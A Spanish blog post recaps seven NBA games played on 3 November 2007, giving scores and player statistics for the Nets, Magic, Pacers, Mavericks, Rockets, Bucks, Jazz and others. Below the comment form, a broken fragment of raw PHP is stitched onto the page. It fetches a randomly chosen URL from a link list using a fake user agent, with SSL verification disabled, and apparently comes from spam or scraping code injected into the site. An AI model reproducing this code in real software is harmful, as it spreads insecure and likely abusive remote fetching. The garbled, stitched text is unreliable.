La crónica (noche del 3/11/07)

04 de November de 2007 por MagicJohnson32

caronarenasLas exhibiciones ofensivas de Pacers, Mavericks y Jazz destacan en una noche de contrastes: tres equipos de Playoffs, Bulls, Wizards y Warriors, ya acumulan tres derrotas  sin una sola victoria. En idéntica situación están los Kings y los Blazers, mientras que Rockets y Pacers sólo conocen la victoria.

Repasemos lo acontecido la pasada madrugada en la NBA.

Nets 93 – Sixers 88jkidd

Jason Kidd sigue produciendo a un enorme nivel. Anoche logró su 50º triple-doble con la camiseta de los Nets y llevo así a su equipo a la segunda victoria de la temporada ante unos Sixers en los que las buenas noticias llegaron desde el banquillo. La buena actuación de Jefferson compensó el horrible momento de forma del juego interior de New Jersey (8 puntos y 12 rebotes entre Krstic, Collins y Magloire). El mal partido de Iguodala, con 16 puntos pero 1 rebote, 1 asistencia, 0 recuperaciones y 4 pérdidas, pesó demasiado a unos Sixers que no alcanzaron el 40% en tiros de campo.

Magic 94 – Wizards 82

Se confirma el mal arranque de los Wizards (0-3), personificado en un Gilbert Arenas errático que acumula un promedio de 33.3% en tiros de campo con un 1 de 17 en triples. Arenas, con problemas en la rodilla, suma además más pérdidas, 15, que asistencias, 12. El buen partido de Butler no bastó ante unos Magic que sentenciaron con un 30-15 en el último cuarto y estuvieron liderados por Turkoglu, excepcional anoche con 25 puntos, 7 rebotes y 8 asistencias. La pareja estelar de Orlando, Lewis & Howard, sumó 35 puntos, 23 rebotes y 6 asistencias.

Pacers 121 – Grizzlies 111paugrito

Ya nos lo avisó Jabho en su análisis de los Pacers: O’Brien llegaba a Indianapolis dispuesto a cambiar el estilo de un equipo que venía caracterizándose por su juego rácano. 119 puntos a los Wizards y 121, anoche, a los Grizzlies no son mala tarjeta de presentación junto a un arranque con tres victorias consecutivas. Dunleavy y Granger lideran el magnífico inicio de los Pacers a la espera de que Jermaine suba sus prestaciones. Los Grizzlies, con buenos partidos de Lowry, Miller y Gasol, fueron siempre por detrás y, pese a acercarse a 4 puntos (105-101), enjacaron su segunda derrota en dos partidos.

bareaKings 102 – Mavs 123

Cuando permites que tu rival anote con un 65% de acierto, pierdes. Espectacular exhibición de acierto la que ofrecieron anoche los Mavericks ante Sacramento, que por su parte encajó su tercera derrota de la temporada. 27-7-5 de Howard, 9 de 11 en tiros de Nowitzki y, más sorprendente, misma estadística de Barea para los Mavs, que no echaron en falta a Devin Harris. Para los Kings, García, Salmons y Martin cumplieron con 78 puntos entre los tres.

Blazers 80 – Rockets 89yaosmile

Balance inverso el que presentan Blazers (0-3) y Rockets (3-0), respondiendo a las perspectivas de ambos equipos para esta temporada. Los texanos no necesitaron demasiado para vencer a los Blazers anoche de la mano, una vez más, de la pareja McGrady-Yao. Aldridge, Roy y Webster fueron los mejores de los de Oregon, en los que ningún otro jugador anotó más de seis puntos.

Bucks 78 – Bulls 72

reddjianHorroroso partido entre Bucks y Bulls, dos equipos que llegaban con un balance de 0-2, y que sirvió para ofrecernos algunos destellos de Jianlian y poner en evidencia el preocupante inicio de Chicago. Redd, con 27-7-5, y Jianlian, con 16-8, lideraron a Milwaukee a su primer triunfo de la temporada, mientras que Joe Smith, con 14 puntos y 10 rebotes, fue el más destacado en los Bulls. Entre Deng, Tyrus Thomas, Hinrich y Ben Wallace sumaron únicamente 21 puntos con 10 de 34 en tiros, 15 rebotes y 9 asistencias. Ben Gordon no estuvo mucho mejor pero al menos logró 15 puntos, 8 rebotes y 3 asistencias.

Warriors 110 – Jazz 133

Segundo enfrentamiento entre Warriors y Jazz en tres partidos y segunda exhibición de los de Sloan, que anoche mayor anotación de los últimos 10 años. De nada sirvió el partidazo de Al Harrington, 38 puntos en 38 minutos con 15 de 20 en tiros. Los Jazz, liderados de nuevo por un Deron Williams estelar (30 puntos con 13 de 17, más 11 asistencias), contaron además con el mejor partido de Okur (9 de 12 en tiros, 28 puntos), 19 de Brewer, 15-8-6 de Kirilenko y 12-10-6 de Boozer. El segundo cuarto, un parcial de 18-36, fue demoledor, y los Jazz redondearon su gran partido con 39 puntos en el último periodo.

baronderon

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>